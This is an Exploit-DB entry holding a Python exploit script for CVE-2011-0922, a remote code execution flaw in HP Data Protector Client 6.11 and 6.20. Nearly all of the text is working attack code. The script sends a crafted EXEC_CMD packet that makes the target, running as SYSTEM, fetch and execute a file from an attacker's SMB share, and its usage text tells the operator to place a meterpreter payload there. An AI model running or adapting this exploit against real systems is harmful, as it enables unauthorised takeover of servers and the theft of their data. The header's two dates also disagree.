HP Data Protector Client - EXEC_CMD Remote Code Execution

EDB-ID:

19288




Platform:

Windows

Date:

2012-06-19


#!/usr/bin/env python

# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-12-06
# Exploit Author: Ben Turner
# Vendor Homepage: www.hp.com
# Version: 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143


import socket
import sys
import binascii

if len(sys.argv) != 4:
    print ""
    print "\033[0;31mUsage: ./hp_protector.py <Target IP> <Port> <Reverse IP> \033[0m" 
    print ""
    print "\033[0;32mMake sure you create a meterpreter payload and a share with the following \\\\<Reverse IP>\\Omniback\\i386\\installservice.exe\033[0m" 
    print "\033[0;32mAlso make sure the SYSTEM account on windows can access your share, this is not always trivial\033[0m"
    print ""
    sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
lhost = sys.argv[3]

# Create a Share with the following:
# Ensure you can access that share with the SYSTEM account on a machine - 
#
# \\ipaddress\Omniback\i386\installservice.exe


b = ''

for char in lhost:
	a = "\x00"+char
	b = b + a

#print b


payload = ("\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"
+ b + 
"\x00\x00\x00\x20\x00\x30\x00"
"\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
"\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
"\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
"\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
"\x5c"
+ b +
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
"\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
"\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
"\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
"\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
"\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"
"\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"
+ b +
"\x5c\x00\x5c\x00\x4f\x00"
"\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
"\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
"\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
"\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
"\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
"\x5c\x00\x5c"
+ b +
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
"\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"
"\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
"\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
"\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"
+ b +
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
"\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00")

print payload

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
while 1:
        data = s.recv(4096)
        if data:
                print data
        else:
                break
s.close()